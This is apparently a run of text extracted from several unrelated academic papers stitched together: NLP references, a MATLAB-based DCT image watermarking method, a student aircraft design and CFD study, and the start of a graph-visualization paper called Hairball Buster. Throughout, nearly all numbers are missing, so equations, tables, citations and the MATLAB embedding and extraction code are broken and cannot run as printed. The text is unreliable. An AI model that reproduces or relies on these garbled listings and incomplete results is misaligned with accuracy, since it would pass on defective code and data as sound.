in proceedings of conference on empiri- cal methods in natural language processing, pages – . bruno olshausen and david field. . sparse coding with an overcomplete basis set: a strategy employed by v ? vision research, pages – . jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. in proceedings of the empiricial methods in natural language processing, pages – . joseph reisinger and raymond mooney. . multi- prototype vector-space models of word meaning. in proceedings of the conference of the north american chapter of the association for computational linguis- tics: human language technologies, pages – . andrew rosenberg and julia hirschberg. . v- measure: a conditional entropy-based external clus- ter evaluation measure. in conference on empirical methods in natural language processing and confer- ence on computational natural language learning, pages – . hinrich schutze. . automatic word sense discrimi- nation. computational linguistics, pages – . ran tian, naoaki okazaki, and kentaro inui. . the mechanism of additive composition. machine learn- ing, ( ): – . peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of seman- tics. journal of artificial intelligence research, pages – . wikimedia. . english wikipedia dump. accessed march . david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in proceed- ings of the rd annual meeting on association for computational linguistics, pages – . international journal of advanced network monitoring and controls volume , no. , a dct domain image watermarking method based on matlab wu he-jing department of computer science & electrical engineering, east university of heilongjiang, harbin, china email: @qq.com abstract. in the text, a method of image watermarking based on dct (discrete cosine transform) domain algorithm is proposed and verified in experiment by matlab. the experimental result shows that the current method can achieve embedding with sound robustness and invisibility. from the experimental results, the quality of the watermarked image is almost no decline relative to the original. keywords: dct, watermarking, matlab, embedding . introduction along with the development of technologies about computer, network, and multimedia, the transmission of multimedia information such as music, image and video becomes more and more convenient, whereas the problem of copyright infringement has brought new opportunity for the effective protection of intellectual property. people invented a technique to hide the company logo, specific digital identifier and other information into the multimedia files for the sake of identification of ownership. such a technique is called digital watermarking, which is a branch in the information hiding technology. 
the basic requirements of digital watermarking are: 1) transparency, meaning that a certain amount of watermarking information is embedded in a digital media host with the hidden data remaining imperceptible and without degrading the original media; 2) robustness, meaning that the digital watermark must survive transformations applied to the host media such as lossy compression, filtering and cropping, that is, the watermark information should not be lost when such transformations are applied; 3) safety, meaning that the digital watermark can resist all kinds of deliberate attack and is difficult to copy or forge as long as the secret key controlling the algorithm is unknown. this paper focuses on the design and implementation of a dct-based image digital watermark. it improves a digital image watermarking algorithm based on the dct transform and arnold scrambling; the security of the watermark is ensured by arnold scrambling of the original watermark information. the experimental results show that the method hides the information of a gray image, and an experimental simulation of some common image attacks is carried out.

2. dct transformation

the discrete cosine transform is an orthogonal transform and one of the most commonly used linear transforms in digital signal processing. it reflects the correlation properties of an image signal. the dct algorithm is of moderate complexity, with moderate energy consumption, and compacts signal energy well. thus, it is widely used in digital signal compression, such as image compression and related fields. jpeg compression is a standard established on the basis of the dct transform, and watermarking algorithms built around the jpeg compression standard have greatly enhanced the ability of a watermark to resist jpeg compression, so the dct transform is very important in watermarking technology.

the dct decomposes an image into a spectrum of different spatial frequencies $F(u,v)$, with $(u,v)$ known as the frequency-domain coordinates. the inverse transform synthesizes the different spatial-frequency components back into the original image. in digital image processing, a two-dimensional dct is normally used. for a picture with dimension $M \times N$, the dct transform is:

$$F(u,v) = c(u)\,c(v) \sum_{x=0}^{M-1} \sum_{y=0}^{N-1} f(x,y)\, \cos\frac{(2x+1)u\pi}{2M}\, \cos\frac{(2y+1)v\pi}{2N}$$

$$c(u) = \begin{cases} \sqrt{1/M}, & u = 0 \\ \sqrt{2/M}, & u = 1,\dots,M-1 \end{cases} \qquad c(v) = \begin{cases} \sqrt{1/N}, & v = 0 \\ \sqrt{2/N}, & v = 1,\dots,N-1 \end{cases}$$

the two-dimensional inverse dct transform formula is:

$$f(x,y) = \sum_{u=0}^{M-1} \sum_{v=0}^{N-1} c(u)\,c(v)\,F(u,v)\, \cos\frac{(2x+1)u\pi}{2M}\, \cos\frac{(2y+1)v\pi}{2N}$$

among them, $x, y$ are the spatial sampling coordinates and $u, v$ are the frequency-domain sampling coordinates. because a digital image is measured in pixels, that is, $M = N$, the two-dimensional dct transform and its inverse simplify to:

$$F(u,v) = c(u)\,c(v) \sum_{x=0}^{N-1} \sum_{y=0}^{N-1} f(x,y)\, \cos\frac{(2x+1)u\pi}{2N}\, \cos\frac{(2y+1)v\pi}{2N}$$

$$f(x,y) = \sum_{u=0}^{N-1} \sum_{v=0}^{N-1} c(u)\,c(v)\,F(u,v)\, \cos\frac{(2x+1)u\pi}{2N}\, \cos\frac{(2y+1)v\pi}{2N}$$

3. discrete cosine transform watermarking embedding algorithm

the digital image watermarking algorithm selects the values of a binary (two-level) gray image as the watermark information and chooses the best one among different embedding coefficients. the carrier image is divided into * blocks, and the gray-level digital watermark values are embedded directly into the dct-transform-domain vectors of the gray image, which realizes the embedded watermarking.
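before detailing the embedding steps, the transform pair above can be exercised numerically. the following is a minimal python/scipy sketch, separate from the paper's matlab listings; the helper names dct2/idct2 simply mirror matlab's functions of the same name, and all inputs are illustrative.

import numpy as np
from scipy.fft import dctn, idctn

def dct2(block):
    # two-dimensional orthonormal dct (same normalization as the c(u), c(v) factors above)
    return dctn(block, norm='ortho')

def idct2(coeffs):
    # two-dimensional orthonormal inverse dct
    return idctn(coeffs, norm='ortho')

# round-trip check on a random 8 x 8 block
rng = np.random.default_rng(0)
f = rng.random((8, 8))
F = dct2(f)
assert np.allclose(idct2(F), f)        # f(x, y) is recovered from F(u, v)
print(F[0, 0], 8 * f.mean())           # for an 8 x 8 block the dc coefficient equals 8 * mean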
specific methods are as follows. let i be the original image with size m × n, and w the watermark image with size p × q, where m and n are even multiples of p and q; the watermark w is loaded into the image i. the algorithm is divided into the following steps:

(1) i is divided into blocks b of size (m/ ) × (n/ ), and a dct transform is applied;
(2) by the arnold transform, b is divided into blocks v of size (m/p) × (n/q), and a dct transform is applied;
(3) the watermark is embedded according to the multiplicative watermarking algorithm, each block is put back into the carrier image i, and the idct transform is performed to obtain the new, watermarked image.

the program code is as follows:

m= ; n= ; k= ;                         % image size, watermark size, block size (values elided in this copy)
i=zeros(m,m);
j=zeros(n,n);
block=zeros(k,k);

% read and prepare the carrier image
subplot( , , );
i=imread('lena.jpg');
i=rgb2gray(i);
i=imresize(i,[ , ],'bicubic');
imwrite(i,'lena .jpg','jpg');
imshow(i);
title('original image');

% read and binarize the watermark image
subplot( , , );
j=imread('heida.jpg');
j=im2bw(j, . );
j=imresize(j,[ , ],'bicubic');
imwrite(j,'heida .jpg','jpg');
imshow(j);
title('the original watermark image');

% block-wise multiplicative embedding in the dct domain
for p= :n
    for q= :n
        x=(p- )*k+ ;
        y=(q- )*k+ ;
        block=i(x:x+k- ,y:y+k- );
        block=dct2(block);
        if j(p,q)==
            a=- ;
        else
            a= ;
        end
        block=block*( +a* . );          % scale the block's dct coefficients up or down by the watermark bit
        block=idct2(block);
        i(x:x+k- ,y:y+k- )=block;
    end
end

subplot( , , );
imshow(i);
title('watermarked image');
imwrite(i,'watermarked.jpg','jpg');

4. discrete cosine transform watermark extraction algorithm

let the image i be the carrier image with the embedded watermark. first the watermark image must be extracted from i; the extraction process is the inverse of the embedding algorithm.

(1) the image i is decomposed into blocks of size (m/ ) × (n/ );
(2) a dct transform is applied to each block;
(3) each block goes through the watermark extraction process according to the inverse of the multiplicative algorithm;
(4) the idct transform is applied, and the watermark image is synthesized.

clear all
m= ; n= ; k= ;
a=imread('lena .jpg');                  % original (unmarked) image
% i=imread('watermarked.jpg');
% i=rgb2gray(i);
a=imresize(a,[ , ],'bicubic');
b=imread('watermarkedr.jpg');           % watermarked (and possibly attacked) image

% block-wise comparison of the two images to recover the watermark bits
% (digits in the block and ratio variable names were lost in extraction; block1, block2 and a1 are reconstructions)
for p= :n
    for q= :n
        x=(p- )*k+ ;
        y=(q- )*k+ ;
        block1=a(x:x+k- ,y:y+k- );
        block2=b(x:x+k- ,y:y+k- );
        block1=idct2(block1);
        block2=idct2(block2);
        if block1( , )==
            if block2( , )~=
                a1=(block2( , )/block1( , ))- ;   % ratio of corresponding coefficients minus one
                if a1<
                    w(p,q)= ;
                else
                    w(p,q)= ;
                end
            end
        end
    end
end

subplot( , , );
imshow(w);
title('the extracted watermark image');
imwrite(w,'w .jpg','jpg');

5. experimental results and analysis

in this paper, the experimental results are obtained from a matlab simulation. the original image is the gray-scale lena image, and the watermark is a binary image containing the words east university of heilongjiang.

figure: the watermark embedding test results. (a) the original carrier image; (b) the binary watermark image; (c) the watermarked image.

as the experimental results show, the quality of the watermarked image is almost unchanged relative to the original and the watermark is practically invisible. shear (cropping), noise, and compression attacks are then applied to the watermarked image and watermark detection is carried out, giving the following figures.

figure: experimental results of % shear. (a) gray image after % shear; (b) watermarked image after % shear.
figure: experimental results of % shear. (a) gray image after % shear; (b) watermarked image after % shear.
figure: experimental results of % shear. (a) gray image after % shear; (b) watermarked image after % shear.

table 1: normalized similarity coefficient (nc) under different shear ratios
shear ratio   %   %   %   %   %   %
nc            .   .   .   .   .

from table 1, we can see that as the shear ratio changes, the normalized similarity coefficient (nc) of the extracted watermark also changes. from the data in the table and the watermark images extracted at different shear ratios, we can see that even when a portion of the image is sheared off, the relevant watermark information can still be extracted.

figure: results for added gaussian noise of variance . . (a) image with gaussian noise of variance . ; (b) watermark extracted from the image with variance . .
figure: experimental results for a gray-image compression factor of . (a) gray image compressed with factor ; (b) watermark extracted from the image compressed with factor .

table 2: compression experiments with different quality factors
quality factor (%)
nc   .   .   .   .   .

we conducted various attack experiments against the algorithm and conclude that it can be applied well to copyright protection and authentication. the experimental results show that the digital watermarking algorithm used here has good robustness, good transparency, and low complexity. in a word, research on digital watermarking techniques has developed rapidly in recent years and remains very active. work in this area has achieved some results, but much remains to be done, and more research is needed to make further progress in this field.
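the normalized similarity coefficient (nc) reported in the two tables above is not written out explicitly in the text. a common choice is the normalized correlation between the original and the extracted watermark; the short python sketch below uses that definition, which is our assumption rather than a formula taken from the paper.

import numpy as np

def normalized_correlation(w_orig, w_extracted):
    # nc = sum(w * w') / sqrt(sum(w^2) * sum(w'^2)) for the original and extracted watermarks
    w1 = np.asarray(w_orig, dtype=float).ravel()
    w2 = np.asarray(w_extracted, dtype=float).ravel()
    return float(w1 @ w2 / (np.sqrt((w1 @ w1) * (w2 @ w2)) + 1e-12))

# example: a watermark that survives an attack with a few flipped bits still gives nc close to 1
rng = np.random.default_rng(1)
w = rng.integers(0, 2, size=(64, 64))
w_attacked = w.copy()
flip = rng.choice(w.size, size=200, replace=False)
w_attacked.flat[flip] = 1 - w_attacked.flat[flip]
print(normalized_correlation(w, w_attacked))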
your paper's title starts here: please center american journal of engineering research (ajer) american journal of engineering research (ajer) e-issn: - p-issn : - volume- , issue- , pp- - www.ajer.org research paper open access w w w . a j e r . o r g page aircraft design analysis, cfd and manufacturing haifa el-sadi* wentworth institute of technology, huntington, boston, ma, usa abstract: aircraft design, manufacturing and cfd analysis as part of aerodynamic course, the students achieve sizing from a conceptual sketch, select the airfoil geometry and the tail geometry, calculate thrust to weight ratio and wing loading, use initial sizing and calculate the aerodynamic forces. the students design their aircraft based on the geometrical dimensions resulted from the calculations and use the model to build a prototype, test it in wind tunnel and achieve cfd analysis to be compared with the experimental results. the theory of aerodynamic is taught and applied as a project based. in this paper, the design process, aircraft manufacturing and cfd analysis are presented to show the effect of project based on student’s learning of aerodynamic course. this project based learning has improved and accelerated students understanding of aerodynamic concepts and involved students in a constructive exploration. the analysis of the aircraft resulted in a study that revolved around the lift and drag generation of this particular aircraft. as to determine the lift and drag forces generated by this plane, a model was created in solidworks a -d model-rendering program. after this model was created it was -d printed in a reduced scale, and subjected to wind tunnel testing. the results from the wind tunnel lab experiment were recorded. for accuracy, the same -d model was then simulated using cfd simulation software within solidworks and compared with the results from the wind tunnel test. the values derived from both the simulation and the wind tunnel tests were then compared with the theoretical calculations for further proof of accuracy. keywords: computational fluid dynamics (cfd), design, aircraft, aerodynamic, wind tunnel i. introduction the conceptual design phases begins a conceptual sketch and aims to determine key design parameters that the final aerodynamics will have to meet. this design will typically include the approximate wing and tail geometries, fuselage shape, and the internal locations of major components such as the engine, cockpit, payload/passenger compartments, landing gears, and fuel tanks. these design requirements are used to estimate the weight of the final aircraft by comparison to previous designs. the takeoff weight is a critical characteristic that will dictate the final size and shape of the airfoil. iterative calculations for this weight are made using assumptions from previous aircraft designs and aerodynamic aiaa table standards [ , , , and ]. the final lift requirements will then determine required airfoil size and shape, with more iterative refinements made between steps. gennarozuppardi shows that an interactive and wholly automatized computer code has been developed on a microcomputer for the aerodynamic analysis of airfoils in incompressible now fields, it is intended to serve as a useful support in teaching aerodynamics. 
the code contains a number of modules (or blocks) for: ( ) drawing the shape with the help of an interactive graphic device interfaced with the microcomputer; ( ) computing the aerodynamic inviscid and viscous flow field and the aerodynamic coefficients; ( ) modifying and/or correcting the body shape and then computing the new aerodynamic coefficients [ ]. mark drela presents some of his views on teaching fluid dynamics and aerodynamics that the course syllabus stresses physical and mathematical understanding of underlying concepts rather than specialized engineering or computational skills, it is argued that deep understanding is what enables the engineer or researcher to generate truly new ideas and work on out of the ordinary topics and to continue personal learning and development throughout a career [ , ]. the goal of this paper and its research is to show the students the steps of aerodynamic design and perform their own design and compare three types of acquired lift results for their own designed aircraft. following proven aerodynamic formulas and aiaa airfoil charts, assumptions were made to provide a baseline weight from which the iterations were run to refine the final design weight. this finalized weight was then used to calculate the geometry of the wings, fuselage, airfoil, and tail section of the aircraft. this geometry was used to model the complete aircraft in computer aided design software and a : scale model was d printed for wind tunnel testing. the wind tunnel was used to measure lift and drag forces for various angles of attack that http://www.sciencedirect.com/science/article/pii/ american journal of engineering research (ajer) w w w . a j e r . o r g page could then be compared to both the iterative calculations as well as the results calculated through computational fluid dynamics. ii. design analysis methods phase # theoretical calculations the theoretical calculations is a useful method as to further define the usage of the aircraft. these calculations will give an idea of the basic structure to the design team. properties that are highly important to a newly designed aircraft are directly resulted from this stage of design. the design team will use this tool to determine the range and weight limitations of the aircraft. before the modeling phase a type of wing will be selected and further refined in later phases of design. the design weight was calculated by taking the weight of everything that was part of the plane and adding it all together. this was used to initially calculate the weight to be used for the design. the empty weight was calculated in accordance with the woguess weight in order to iterate with the calculated design weight. by using multiple iterations the design weight could be narrowed down to one true value. empty weight fraction the recalculated empty weight fraction was used with the intention of recalculating the design weight. which would be the final weight that would be used in the design. this was necessary for not only recalculating the design weight but also the fuselage. recalculated empty weight fraction the recalculated design weight was taken in order to calculate the final design weight used in the design using the recalculated empty weight fraction. this formula is also used to determine the value of the recalculated fuselage length. recalculated design weight fuselage length fuselage area span american journal of engineering research (ajer) w w w . a j e r . 
o r g page ar is an aspect ratio which is the ratio of its length to its chord. a low aspect ratio indicates short, stubby wings while a high aspect ratio indicates long narrow wings. this equation is used to determine the true aspect ratio. the length of the wing span is determined using the aspect ratio and is also vital to the geometry and design of the aircraft. it’s determined by taking the square root of the product of the aspect ratio and area of the wing. the wing area is also a vital component to the design of the aircraft, calculated by simply multiplying the wing thickness by the span. wing area the horizontal tail is required in any plane for flight. with the fuselage and wings accounted for the design of the tail is all that is missing. the horizontal tail is determined by multiplying . by the thickness ratio. lift forces contrast with the drag force and is the component of the force of a fluid flowing past the aircraft perpendicular to the oncoming flow direction. the lift and forces were determined at different angles of attack from to degrees. the first priority of testing was to render a three dimensional representation of the proposed design using solidworks. using the calculated dimensions for the fuselage. following the fuselage, the wings needed to be modeled. the airfoil chosen for the aircraft was the naca . using the calculated values for span, chord lengths (root, mean, and tip), mean chord span, one wing was modeled and then mirrored in solidworks for consistency throughout the entire wing span, as shown in table and figure . table . aircraft dimensions american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . solid works model of aircraft phase # wind tunnel laboratory experiment upon completing all parts of the aircraft, they were assembled together to produce the final model of the proposed aircraft (as shown in figure ). this model was scaled down : in order to print it using the uprinter -d printer located in the manufacturing center at wentworth institute of technology. the material that the model was printed with was absplus plastic american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . the d printed model phase # cfd simulation a cfd study in the solidworks program paralleled the experimental wind tunnel analysis. the same conditions were reproduced within the program. the exact same scaled model was also studied. as to ensure accuracy each study was performed independently and uninfluenced by one another. the model created in the solidworks program was then prepared for simulation. the meshing function of the simulation proved to be highly instrumental in attaining accurate results from the cfd. figure shows the contour of the pressure and figure shows the streamlines of air around the aircraft. fig. . the pressure contour of the airplane american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . the streamlines of the air around the airplane the comparison between the experiments and the cfd simulation has been carried out as shown in figures and . at low angle of attack the difference between the experiments and cfd is slightly significant comparing to high angle of attack for both drag and lift forces. parasitic drag in the cfd simulation was not indicative of what we found in the theoretical calculations. further refinement of this model would likely reduce the percent difference observed, although not by much. 
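the sizing chain described above (guess a takeoff weight, update the empty-weight fraction, recompute, then derive the wing geometry from the aspect ratio) can be sketched as a short python routine. this is a generic rendering of the standard statistical sizing relations in the spirit of raymer's text cited in the references, not the calculations used for this design; the coefficients a and c of the empty-weight fraction and every numeric input are placeholders.

def size_takeoff_weight(w_crew, w_payload, fuel_fraction, a, c, w0_guess=3000.0):
    # fixed-point iteration on  w0 = (w_crew + w_payload) / (1 - wf/w0 - we/w0),
    # with the statistical empty-weight fraction  we/w0 = a * w0**c
    w0 = w0_guess
    for _ in range(100):
        empty_fraction = a * w0 ** c
        w0_new = (w_crew + w_payload) / (1.0 - fuel_fraction - empty_fraction)
        if abs(w0_new - w0) < 1.0:
            break
        w0 = w0_new
    return w0

def wing_geometry(aspect_ratio, wing_area):
    # ar = b**2 / s  =>  span b = sqrt(ar * s);  mean chord from s = b * c_bar
    span = (aspect_ratio * wing_area) ** 0.5
    mean_chord = wing_area / span
    return span, mean_chord

# illustrative inputs only, not the values used in the design above
w0 = size_takeoff_weight(w_crew=180.0, w_payload=400.0, fuel_fraction=0.15, a=1.0, c=-0.05)
span, mean_chord = wing_geometry(aspect_ratio=7.0, wing_area=120.0)
print(round(w0, 1), round(span, 2), round(mean_chord, 2))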
in contrast, the lift percent error ranged from only to % which is quite good considering the many assumptions made. overall, a trend can still be seen in these two sets of data: a positive correlation between drag and lift as a function of angle of attack. as angle of attack increases, so do both drag and lift. this makes sense because as the plane pitches up more surface area is in contact with the flow, causing more drag. but at the same time, the increased angle of attack on the airfoil creates a greater pressure drop because the air moves faster over the top of the wing, attributing to more lift. this trend carried over to the comparison between the cfd and wind-tunnel tests of the : scale model. teams were made aware that the wind tunnel would not be a very accurate measurement tool. it was not designed to simulate the conditions the project required, nor were the d models perfect representations of the cfd models. despite these truths, percent error for both lift and drag fell between . and % for both the . and . mph wind tunnel trials. given the circumstances, these results were considered successful, as they still provide a valid representation of angle of attack’s effects on both lift and drag on aircraft. in retrospect, more could have been done to reduce the gross percent errors that were experienced during the design process, primarily in testing equipment and procedure, but the concepts applied would remain the same. the three phases of design and assumptions that were made based on the a produced somewhat reasonable lift and drag results for the designed aircraft’s aerodynamics. table shows the comparison of the results of drag and lift forces. american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . comparing drag-experiment and cfd vs. angle of attack fig. . comparing drag-experiment and cfd vs. angle of attack iii. conclusion the three phases of design were critical in following a set design procedure, and using the assumptions to make reasonable estimates for our own model. while these assumptions assisted in moving the design along, they greatly contributed to the errors we would see between our different data trials: the theoretical manual calculations, cfd simulation, and scale model wind tunnel test. these various paths allowed us to better understand different means of data acquisition for airfoils, and helped affirm validity in our design process. overall, a trend can still be seen in these two sets of data: a positive correlation between drag and lift as a function of angle of attack. as angle of attack increases, so do both drag and lift. this makes sense because as the plane pitches up more surface area is in contact with the flow, causing more drag. but at the same time, the increased angle of attack on the airfoil creates a greater pressure drop because the air moves faster over the top of the wing, attributing to more lift. it is concluded that this project-based learning has improved and accelerated students understanding of aerodynamic concepts and involved students in a constructive exploration american journal of engineering research (ajer) w w w . a j e r . 
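the data reduction behind the wind-tunnel versus cfd comparison above can be written compactly. the coefficient definitions below are the standard ones; every number is an illustrative placeholder rather than a value measured in this project.

import numpy as np

def force_coefficient(force, rho, velocity, ref_area):
    # c_l or c_d = f / (0.5 * rho * v**2 * s_ref)
    return force / (0.5 * rho * velocity ** 2 * ref_area)

def percent_difference(experiment, cfd):
    # percent difference between the wind-tunnel value and the cfd value
    return 100.0 * np.abs(experiment - cfd) / np.abs(cfd)

# placeholder comparison at a few angles of attack
rho, v, s_ref = 1.225, 15.0, 0.05                  # air density [kg/m^3], tunnel speed [m/s], model wing area [m^2]
alpha = np.array([0, 4, 8, 12])                    # angle of attack [deg]
lift_tunnel = np.array([0.40, 1.10, 1.90, 2.60])   # measured lift [N]
lift_cfd = np.array([0.45, 1.05, 1.80, 2.40])      # simulated lift [N]
cl_tunnel = force_coefficient(lift_tunnel, rho, v, s_ref)
cl_cfd = force_coefficient(lift_cfd, rho, v, s_ref)
for a, err in zip(alpha, percent_difference(lift_tunnel, lift_cfd)):
    print(f"alpha = {a:2d} deg: lift percent difference = {err:.1f}%")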
o r g page e - endurance r - range c cruise - specific fuel consumption c loiter - loitering specific fuel consumption v - cruise velocity l - lift force d - drag force w empty - average weight empty w crew - average weight of crew w payload - average weight of payload w max - average maximum weight l f - fuselage length s f - fuselage area s wing - wing area s wet - aircraft wetted area s ht - horizontal tail area ht - horizontal tail l ww - wing weight q - dynamic pressure c lmax - max lift coefficient of wing c l - lift coefficient of wing c - lift coefficient of airfoil ar - aspect ratio b - wing span t - thrust references [ ]. anderson, jr., j.d., , introduction to flight, mcgraw-hill, seventh edition [ ]. j.j. bertin, aerodynamics for engineers, th ed., prentice hall, . [ ]. kuethe, a.m. and chow, c.-y., foundations of aerodynamics, th ed., wiley, [ ]. houghton, e.l. and carruthers n.b., aerodynamics for engineering students, rd ed., arnold, [ ]. daniel p.raymer,“aircraft design: aconceptual approach”, published by american institute of aeronautics and astronautics,inc. [ ]. gennarozuppardi, luigi g. napolitano, “teaching aerodynamics using a microcomputer”, computers & education, volume , issue , , pages – [ ]. mark drela, “assorted views on teaching of aerodynamics”, th aiaa applied aerodynamics conference, , aiaa- - connections issue | vol. article | doi: . /connections- . hairball buster: a graph triage method for viewing and comparing graphs patrick allen,* mark matties and elisha peterson johns hopkins university applied physics laboratory, laurel, md. *e-mail: patrick.allen@jhuapl.edu abstract hairball buster (hb) (also called node-neighbor centrality or nnc) is an approach to graph analytic triage that uses simple calculations and visualization to quickly understand and compare graphs. rather than displaying highly interconnected graphs as ‘hairballs’ that are difficult to understand, hb provides a simple standard visual representation of a graph and its metrics, combining a monotonically decreasing curve of node metrics with indicators of each node’s neighbors’ metrics. the hb visual is canonical, in the sense that it provides a standard output for each node-link graph. it helps analysts quickly identify areas for further investigation, and also allows for easy comparison between graphs of different data sets. the calculations required for creating an hb display is order m plus n log n, where n is the number of nodes and m is the number of edges. this paper includes examples of the hb approach applied to four real-world data sets. it also compares hb to similar visual approaches such as degree histograms, adjacency matrices, blockmodeling, and force-based layout techniques. hb presents greater information density than other algorithms at lower or equal calculation cost, efficiently presenting information in a single display that is not available in any other single display. keywords graph analytic triage, node-neighbor centrality, standard canonical form for graphs, comparing graphs. purpose and overview the purpose of this paper is to describe a new method for analyzing relationships among nodes in a graph using a canonical representation that also enables comparison between different graphs. the approach is called ‘node-neighbor centrality’ (nnc), or more colloquially, ‘hairball buster’ (hb). 
hb computes a centrality measure (such as node degree) for a node and its neighbors, and presents this computation in an efficient, standardized visual form that scales to very large graphs. using the visual depiction of the measure, an analyst can quickly answer questions such as whether the graph is (generally) from a social network or a random graph. additionally, the depiction retains information about relationships, so an analyst can also quickly determine whether high-degree nodes are connected to each other directly or through a mutually adjacent node, such as in a bipartite graph. this paper presents examples of the hb approach addressing five types of analytic questions using four real-world data sets. hb is a canonical approach using node degrees that allows for comparison of different graphs, while extensions of hb include the display of selected graph attributes such as link weights. the use of alternative measures of centrality is also presented. the approach is compared and contrasted with other common graph algorithms. the paper concludes with the limitations of the hb approach and future planned features and applications. the hb python code is available at https://github. com/patallen /hairball-buster. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). hairball buster: a graph triage method for viewing and comparing graphs the need the most commonly used graph visualization techniques include node-link visualizations that embed a graph’s nodes and links in two-dimensional space, and adjacency matrix visualizations that show the entire space of possible connections in a large matrix. each of these techniques has a number of advantages and disadvantages (ghoniem et al., ). a particularly challenging case is graphs that have so many elements and interconnected features that it becomes difficult to determine which nodes and links are most ‘important.’ when using standard graph visualization algorithms such as force-directed (kamada and kawai, ; fruchterman and reingold, ) or dimensional reduction, the usual starting point is a depiction of all nodes and links. for many kinds of graphs, especially those with high connectivity, this results in a ‘hairball’ as shown in figure , which shows a link between every pair of jazz musicians that have performed together (gleiser and danon, ). the purpose of graph visualization is to help an analyst understand features of the graph or a particular node, using visual queries (freeman, ; peterson, ; ware, ). however, in this typical ‘hairball,’ it is difficult to determine at a glance the nodes with the highest degree, the distribution of nodes by degree, and whether the highest degree nodes are directly connected to each other. an analyst needs to apply a range of other algorithms to further dissect the graph, sometimes requiring multiple iterations, to determine how the various nodes relate to each other. in addition, there are a number of additional challenges that arise when visualizing graphs that change over time (bender-demoll and mcfarland, ; peterson, ). there is a tendency in force-directed visualization for nodes and links to reposition themselves, every time new nodes or links are added or removed. this makes it difficult not only to identify key nodes, but to track them over time. 
a number of approaches have been suggested, but they do not fully address the issue and are computationally expensive (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). an alternative approach is the backbone layout, which attempts to directly resolve difficulties in visualizing particularly dense portions of a force- directed layout (lehmann and kottler, , nocaj et al., , ). figure shows the same data set using visone’s quadrilateral simmelian backbone layout. while the big hairball of figure has been broken up into four clusters, one large hairball has turned into several smaller hairballs. one still cannot answer many questions of interest to a data analyst, e.g. which nodes have the highest degree or how nodes of high degree are connected to each other. there is also an inherent performance cost when generating force-directed graph displays, most of which are at a minimum order n , where n is the number of nodes (fruchterman and reingold, ). because of the challenges in visualizing node- link diagrams in these cases, alternatives, such as an adjacency matrix visualization, are often proposed (sheny and maz, ). adjacency matrices also can be a very effective way to visualize clusters, so they are often used when studying communities, sometimes referred to as clustering or blockmodeling (wasserman and faust, ; white et al., ). in one study, the authors found that the adjacency matrix is almost always superior for a certain set of tasks to the node- link diagram (ghoniem et al., ). however, the authors did not include any graphs with more than nodes in their study, and this is the principle drawback of adjacency matrix visualizations: they do not scale well to graphs with thousands or millions of nodes. hb approach hb is a new way of looking at graph data that scales effectively to large, dense graphs. the approach is simple to calculate and plot, and provides an easy way to identify by inspection the most connected nodes and most important links in the graph. assume there is a graph with n nodes and m links. the degree of each node is the number of links connected to that node. (throughout this paper, we will use degree as our primary measure of centrality, figure : sample ‘hairball’ showing jazz players that performed with each other. connections although hb representations of other centrality measures are presented later.) there are six steps to creating the hb plot as follows: . calculate the centrality (degree) of each node (which requires m calculations). . sort the nodes by degree, assigning ranks from (the highest degree node) to n (which requires n log n calculations). . plot (in one color) the monotonically decreas- ing curve of degree (vertical axis) vs. node rank (horizontal axis). (there will be n points on this curve, one for each node.) call this ‘the curve’ and the nodes on it ‘curve nodes.’ . calculate the neighbors of each node and place each neighbor on a list associated with each ranked node. (the placement of the neighbor on the list of neighbors for each node is accomplished during the initial m calcula- tions in step .) . store the degree of the neighbor with the neighbor node. (this step uses an index for each node so that the degree of the neighbor is an indexed look-up.) . for each node, plot (in another color) the value of each of its neighbor’s degrees on the verti- cal line at the same horizontal position as that node, so that each of its neighbors will be rep- resented above or below that node’s position on the curve. 
call these the ‘neighbor nodes.’ optional calculations, such as ensuring canonicalization and parallelization, and display options for log–log, semi–log, inverse, and same degree offsets, are pre- sented in section ‘optional steps of the hb algorithm.’ the computational efficiency of hb is on the order of m + n log n. in contrast, traditional graph displays that look like the hairball shown in figure require order n (fruchterman and reingold, ). in addition, some algorithms only sample the graph data set, while the hb approach deals with the whole data set in one pass (squartini et al., ). see section ‘hb measures of performance’ for further details. in addition to computational efficiency, hb uses visual space more efficiently than an adjacency matrix, making it suitable for graphs of any size. it supports many of the same visual queries as an adjacency matrix, with the additional advantage that it can highlight not just a node’s neighbors or clusters, but also how a node’s centrality measure relates to those of its neighbors. in the remainder of this paper, these advantages are described in more detail by analyzing several real-world sample graphs. first application: quickly identifying key nodes and relationships in a graph this section uses the jazz data set to illustrate how hb can answer common analytic questions about figure : visone backbone layout of jazz player data set. hairball buster: a graph triage method for viewing and comparing graphs which nodes have the highest degree and how these are connected to other types of nodes. figure depicts the degree curve (step , above). note that there are four very high-degree nodes in the upper-left-hand corner. the rest of the nodes follow a fairly linear path from upper left to lower right. (this pattern is typical for social networks.) figure displays the neighbors of the curve nodes (steps , , and above). each red dot represents one or more links on a traditional graph display. the dot’s vertical position indicates the node at one end of the link and its horizontal position indicates the node at the other end. for example, the red dot at coordinate ( , ) is the link between figure : sample hb curve for jazz players that performed with each other. figure : neighbors plot for jazz players that performed with each other. connections the first and second nodes on the curve (first two blue dots). this curve is not quite the same as a histogram or node-degree distribution, where one dot represents many nodes of the same degree. as with node- degree curves, the shape can be useful for comparing different graphs. however, hb displays one dot for each node, since the horizontal axis is the degree rank of the node. this is an important distinction, because hb retains connectivity information about individual nodes that other techniques do not and can therefore answer a much broader class of questions. it can also address additional questions that an adjacency matrix cannot, as will be summarized later. unlike the backbone layout display, the hb chart clearly shows which nodes have highest degree, how much higher their degree is than other nodes, whether the highest degree nodes are directly or indirectly connected to other high-degree nodes, and how high- degree nodes tend to connect to low-degree nodes. this is summarized in figure . 
